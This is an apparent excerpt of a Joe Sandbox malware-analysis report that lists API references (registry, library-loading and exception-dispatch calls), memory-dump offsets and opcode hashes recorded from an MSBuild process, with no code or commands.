                                                                                    • Instruction ID: 16ffba34afa98ed622d83ea72fbdb441a57d982b8e58ea9f3240063ecf1d0b9f
                                                                                    • Opcode Fuzzy Hash: 6745d7d29ff34631cbec6cb92e2a964ee1900642aacaa7707605485ce3169454
                                                                                    • Instruction Fuzzy Hash: 544178B0D002999FDB10CFA9C584A8EFFF5BF08314F28856AD809AB301D3749985CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: dd4dd23aa8c446d191b0dafbc406d50b2b79eab994ce1797afdcc06e4bde8ea0
                                                                                    • Instruction ID: 263d10b24dd67abe61f5d070575cc1dab26685ea5738ced28883099b4cd46f3d
                                                                                    • Opcode Fuzzy Hash: dd4dd23aa8c446d191b0dafbc406d50b2b79eab994ce1797afdcc06e4bde8ea0
                                                                                    • Instruction Fuzzy Hash: 4F51B534A02268CFDBA9EF30D88869DB7B2FF49306F1045E9D50AA2240DB359EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 06825C24
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.523188959.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_6820000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: Open
                                                                                    • String ID:
                                                                                    • API String ID: 71445658-0
                                                                                    • Opcode ID: b962e153a36a6e19b58c9eeb7012ce245338ff82ebea77822e76ce1c4fe3dec4
                                                                                    • Instruction ID: 7299dfccfd18853c9bdaa06becd9ee0d7f5ca91a1477eaee5a588da23c400b3b
                                                                                    • Opcode Fuzzy Hash: b962e153a36a6e19b58c9eeb7012ce245338ff82ebea77822e76ce1c4fe3dec4
                                                                                    • Instruction Fuzzy Hash: 77414770E0435A8FDB00CF98C548B9EFBF1AF48314F28C56AE409AB351D7799985CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNELBASE(?), ref: 0159C9BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.511312979.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_1590000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: 84b275ca8f8d8065cd2a9d2b44d2367de77d7098bee0f9f96e374174626399fd
                                                                                    • Instruction ID: 10f7aeb8a74ecb1572d45f3354a35a213706b68eec55f2678fc5fe955b00485d
                                                                                    • Opcode Fuzzy Hash: 84b275ca8f8d8065cd2a9d2b44d2367de77d7098bee0f9f96e374174626399fd
                                                                                    • Instruction Fuzzy Hash: EA3125B1D002498FDF14CFA8C98579EBFB1BB09314F14852EE855AB380D7789485CF96
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNELBASE(?), ref: 0159C9BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.511312979.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_1590000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: 34a4377d51346d9a100d0857db35091173e41174f6aad4474c4dc0ac618d6f95
                                                                                    • Instruction ID: d73805d73e53a68ad84ad934f6280c91bd82f1317b983b966e4fe654b8c83a40
                                                                                    • Opcode Fuzzy Hash: 34a4377d51346d9a100d0857db35091173e41174f6aad4474c4dc0ac618d6f95
                                                                                    • Instruction Fuzzy Hash: 2A3116B1D102499FDF14CFA9C98579EBBF1BB09314F14852DE815AB380D778A881CF96
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 6286358657f0a5b57bf9fed7f6194daf06a56b5de7803534458ff411827a0eda
                                                                                    • Instruction ID: 2edc4683798700c764ed5a33c628d3a4e18e34225913f9450ddbd363ec351ec3
                                                                                    • Opcode Fuzzy Hash: 6286358657f0a5b57bf9fed7f6194daf06a56b5de7803534458ff411827a0eda
                                                                                    • Instruction Fuzzy Hash: 3C41C634A02259CFDBA9EF30D88869DB7B2FF49306F5045E9D50A96250CB359EC1CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 06825EE1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.523188959.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_6820000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: QueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3660427363-0
                                                                                    • Opcode ID: 168ea3ff063429f5d8f3b74213ab8cb7021db379bfc246e9322fbe2859ddb773
                                                                                    • Instruction ID: 4a4bc11f9051bba5e95bc9436501e6029099d7c48352cb9d8bcdabd2ab4c36be
                                                                                    • Opcode Fuzzy Hash: 168ea3ff063429f5d8f3b74213ab8cb7021db379bfc246e9322fbe2859ddb773
                                                                                    • Instruction Fuzzy Hash: B831E2B5D002699FCB10CFAAD884ACEBBF5BF48354F54802AE919EB310D7749945CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 13779ef897f0e941328023e4578ed7ec0bf699aeb553b1caba5f5de18339bf98
                                                                                    • Instruction ID: a05a88169290378861eb186a164dba87469f16db96c89100e9ed891a3301de39
                                                                                    • Opcode Fuzzy Hash: 13779ef897f0e941328023e4578ed7ec0bf699aeb553b1caba5f5de18339bf98
                                                                                    • Instruction Fuzzy Hash: C141B534A02258CFDBA5EF30D88869DB7B2FF49306F6045E9D54AA6250CB359EC1CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 06825C24
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.523188959.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_6820000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: Open
                                                                                    • String ID:
                                                                                    • API String ID: 71445658-0
                                                                                    • Opcode ID: 9832db6206116c5fcbeccb23bd9f979342cc858c744fc106cfc334c1a16ab816
                                                                                    • Instruction ID: 826ffbfacd63c8fbddf14b53ebb07d36f557507b95da6c08a774e643ab978f30
                                                                                    • Opcode Fuzzy Hash: 9832db6206116c5fcbeccb23bd9f979342cc858c744fc106cfc334c1a16ab816
                                                                                    • Instruction Fuzzy Hash: F431F0B1D002599FDB10CF99C584A8EFFF5BF48314F28816AE809AB310D7759985CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: aeb5caa2d5c2f66ce3991d12747fa343046da575e17c808bc13bc14b7555aff5
                                                                                    • Instruction ID: 08491c1399bb2772c2da0bb609595bee91fb4a984a014a493e847ff4f19134b8
                                                                                    • Opcode Fuzzy Hash: aeb5caa2d5c2f66ce3991d12747fa343046da575e17c808bc13bc14b7555aff5
                                                                                    • Instruction Fuzzy Hash: D0419534A02269CFDB65EF30D88869DB7B2FF49306F5045EAD54AA6240CB359E81CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 1cc147e78aa26351d513ea2fc5d65c4e83bfc77757561b8dcd77ec8671bec525
                                                                                    • Instruction ID: 873139baa3b79625a41ff5ad33ed181d2d90a9a4336d14fcb2c361a90f2f4c74
                                                                                    • Opcode Fuzzy Hash: 1cc147e78aa26351d513ea2fc5d65c4e83bfc77757561b8dcd77ec8671bec525
                                                                                    • Instruction Fuzzy Hash: EF31B634A02269CFDB65EF30D88869DB7B2FF49306F5045EAD54AA6340CB359E81CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,069BCA4E,?,?,?,?,?), ref: 069BCB0F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.523442817.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_69b0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: d36594082458f6c3736bae1da36362dfddfc6d4abccf1a0088f72e13a7f4a177
                                                                                    • Instruction ID: f02efc2aca90ea8ca664dc5866641ae6206df44d41a21231087e6d147d2fffed
                                                                                    • Opcode Fuzzy Hash: d36594082458f6c3736bae1da36362dfddfc6d4abccf1a0088f72e13a7f4a177
                                                                                    • Instruction Fuzzy Hash: 0321E4B5D00218DFDB10CFA9D984ADEBBF8EB58364F14841AE914B7710D374A954CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 8f33ca990e55ebdf0695ac15932c3b1256fbfcaaf9204a1715c8d5420c35de3d
                                                                                    • Instruction ID: 7800479c4fec2bac4e850107814f8763c9f298e2438b755fd5b5118fe8030332
                                                                                    • Opcode Fuzzy Hash: 8f33ca990e55ebdf0695ac15932c3b1256fbfcaaf9204a1715c8d5420c35de3d
                                                                                    • Instruction Fuzzy Hash: 4131C874A02259CFDB65EF20D88969DB7B6FF4A306F1045EAD50AA2240CB359E81CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 01594D42
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.511312979.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_1590000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: EncodePointer
                                                                                    • String ID:
                                                                                    • API String ID: 2118026453-0
                                                                                    • Opcode ID: 3409eb94fac050590947c4584957290571c293e230d2dae915adfe2e014f7fda
                                                                                    • Instruction ID: d2b772c3ca8cc4be0d23e093f5f610f67d497b24abc8af96210cde2890edaef5
                                                                                    • Opcode Fuzzy Hash: 3409eb94fac050590947c4584957290571c293e230d2dae915adfe2e014f7fda
                                                                                    • Instruction Fuzzy Hash: F121ACB59003458FDF50DFA8D64939EBBF4FB09318F24846AD809E7640DB785986CFA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 782def2bef02a68af8576fd8dea431d99f265038d9184f0b408c2bde784f9672
                                                                                    • Instruction ID: 775f4a020624ff9881e8666b4404fbc884128056eea38d09e7ec7d3167485904
                                                                                    • Opcode Fuzzy Hash: 782def2bef02a68af8576fd8dea431d99f265038d9184f0b408c2bde784f9672
                                                                                    • Instruction Fuzzy Hash: 1C21D834A02258CFDB65EF20D88869DB7B6FF49306F1045EAD54AA2240CB359EC1CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,069B80D2), ref: 069B81BF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.523442817.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_69b0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemoryStatus
                                                                                    • String ID:
                                                                                    • API String ID: 1890195054-0
                                                                                    • Opcode ID: 06604dd4f7b97e7d77850ac6acb01b7cf2dda8629e3a342c808217f0a330249e
                                                                                    • Instruction ID: d7eb064d42682abaa3137b8667dd09f4c92169e4ce846029015cb85a7f0820d1
                                                                                    • Opcode Fuzzy Hash: 06604dd4f7b97e7d77850ac6acb01b7cf2dda8629e3a342c808217f0a330249e
                                                                                    • Instruction Fuzzy Hash: 1F1103B1D006599BCB10DF9AC9447DEFBF8EB48224F14856AD828B7740D378A944CFE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 01594D42
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.511312979.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_1590000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: EncodePointer
                                                                                    • String ID:
                                                                                    • API String ID: 2118026453-0
                                                                                    • Opcode ID: 22a616806122337c14baabd67ce217a7e0c36df32712f021648ab9f2debb2064
                                                                                    • Instruction ID: 984c631ec92b1df9f6b6f3d7f211fcbc705210ca85a4737f611c543af0785c87
                                                                                    • Opcode Fuzzy Hash: 22a616806122337c14baabd67ce217a7e0c36df32712f021648ab9f2debb2064
                                                                                    • Instruction Fuzzy Hash: 0D1189B49003458FCF50DFA9D64879EBFF4FB09314F108429D805A7640DB786986CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: cf401be44b1affd6190f4fccdf6f13b20b8dd24663b658c8d44ff05a2566b75b
                                                                                    • Instruction ID: 78184806acd9d8d6ea3f3b9187b949a84241ec784c98b96328b2af9e1d7099d1
                                                                                    • Opcode Fuzzy Hash: cf401be44b1affd6190f4fccdf6f13b20b8dd24663b658c8d44ff05a2566b75b
                                                                                    • Instruction Fuzzy Hash: 01210A34A02258CFDB65EF30D88969DB7B6FF49307F1044EAD54A96240CB359E81CF92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 465fcf01c04be4de153b856713d24c44880f365feba04820c76e5b34bbf6961a
                                                                                    • Instruction ID: 8abdd41120427ee617658a3e0324dc3d8c8f6b6a4c03dbcde43bdda1a62ca0ac
                                                                                    • Opcode Fuzzy Hash: 465fcf01c04be4de153b856713d24c44880f365feba04820c76e5b34bbf6961a
                                                                                    • Instruction Fuzzy Hash: 0511F834A01268CFDB65EF20D88869DB7B6FF49306F1005EAD54AA6240CB349E81CF52
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: ffa98f6fcf9269398ecd243c8ccba095931c1320137ba2018e21f7037caa0b65
                                                                                    • Instruction ID: dfcd1f5cc7ac65a1f0530c15de738fc5670963e3cf09f0d1479195445585b5ef
                                                                                    • Opcode Fuzzy Hash: ffa98f6fcf9269398ecd243c8ccba095931c1320137ba2018e21f7037caa0b65
                                                                                    • Instruction Fuzzy Hash: 3601ED34A01259CFDB64DF20D88869DB7B1FF45306F1045EAD54997240CB349E81CF81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.511013596.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_153d000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 475a2e660a095167dead79f30f11836cebaa6f283f0ec24228f73952f2528010
                                                                                    • Instruction ID: 584def8ff7973ad0448b56e1e60e585eaaa0aecd402f4c2f844b67a54a7210bf
                                                                                    • Opcode Fuzzy Hash: 475a2e660a095167dead79f30f11836cebaa6f283f0ec24228f73952f2528010
                                                                                    • Instruction Fuzzy Hash: 7742077244E7C04FD7638B748C627827FB0AF53224F1A80EBC885CE6A3D56D595AC726
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.511013596.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_153d000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5e78d7293632e58c960c1b6af76fa6af7893af84ee08ef295efbc5dd1931ac8b
                                                                                    • Instruction ID: 5b62eab08be092eb50c60f9f750fca37c47162f65d90f92eb0a39eadb94dfa82
                                                                                    • Opcode Fuzzy Hash: 5e78d7293632e58c960c1b6af76fa6af7893af84ee08ef295efbc5dd1931ac8b
                                                                                    • Instruction Fuzzy Hash: 4732197244E7C04FD7638B74CC627827FB0AF53225F1A80EBC885CE6A3D569594AC726
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.510888605.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_152d000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e8f71e87276ca95326e0428e35a3dd097d885802e9d6cd539032f8bf90718e4f
                                                                                    • Instruction ID: 10e3b047b25b5ac1c0e3a26bdf0dec05699628a119b3d30edc358d31db50c0ac
                                                                                    • Opcode Fuzzy Hash: e8f71e87276ca95326e0428e35a3dd097d885802e9d6cd539032f8bf90718e4f
                                                                                    • Instruction Fuzzy Hash: 9A212572604240DFDB05CF54D9C0B5ABFB5FB89328F248569E8050F686C376D85ACBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.510888605.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_152d000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ffd8a7a280df8f5bf9f5f76be26c3cf5e5134af1524968e00178f7cf351f64d6
                                                                                    • Instruction ID: dc7c18d6c113e24c90d50fe9e3806ee4ee91139ff0d18c45366d1ff9ee3811f7
                                                                                    • Opcode Fuzzy Hash: ffd8a7a280df8f5bf9f5f76be26c3cf5e5134af1524968e00178f7cf351f64d6
                                                                                    • Instruction Fuzzy Hash: D4210372504240EFDB05DF54D9C0BAABBB5FB89324F24C969E8090F686C376E856C6E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.511013596.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_153d000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 181324d71ce802fecb4f579919b947bacc42cb8d67fab2e9256e1c223b98fb13
                                                                                    • Instruction ID: aff3c7c02e788c8f3a75990457c143f1a006097226f4a0c8566af66d143480b1
                                                                                    • Opcode Fuzzy Hash: 181324d71ce802fecb4f579919b947bacc42cb8d67fab2e9256e1c223b98fb13
                                                                                    • Instruction Fuzzy Hash: 7521F275504240EFDB05DF14D9C5B1ABBE5FB88228F24C96DE9094F746C33AD84ACAA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.510888605.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_152d000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 443a7f9af640cd919331e281847f8d6becf020b849bdf04c35086449af5cbafc
                                                                                    • Instruction ID: ffef5b50648c1d4b0fe280e491ffe083249955182f35125deb877d6ddaf22e89
                                                                                    • Opcode Fuzzy Hash: 443a7f9af640cd919331e281847f8d6becf020b849bdf04c35086449af5cbafc
                                                                                    • Instruction Fuzzy Hash: 5C11D376504280CFDB12CF54D5C4B1ABF71FB85324F2486A9D8054F656C33AD556CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.510888605.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_152d000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 443a7f9af640cd919331e281847f8d6becf020b849bdf04c35086449af5cbafc
                                                                                    • Instruction ID: 325336caeb1490feb3dc6204def1ae9227374be6e56714f4085abaa27c9875bb
                                                                                    • Opcode Fuzzy Hash: 443a7f9af640cd919331e281847f8d6becf020b849bdf04c35086449af5cbafc
                                                                                    • Instruction Fuzzy Hash: 6511B176404280DFCB02CF54D5C4B5ABF72FB85324F24C6A9D8080B656C33AE456CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%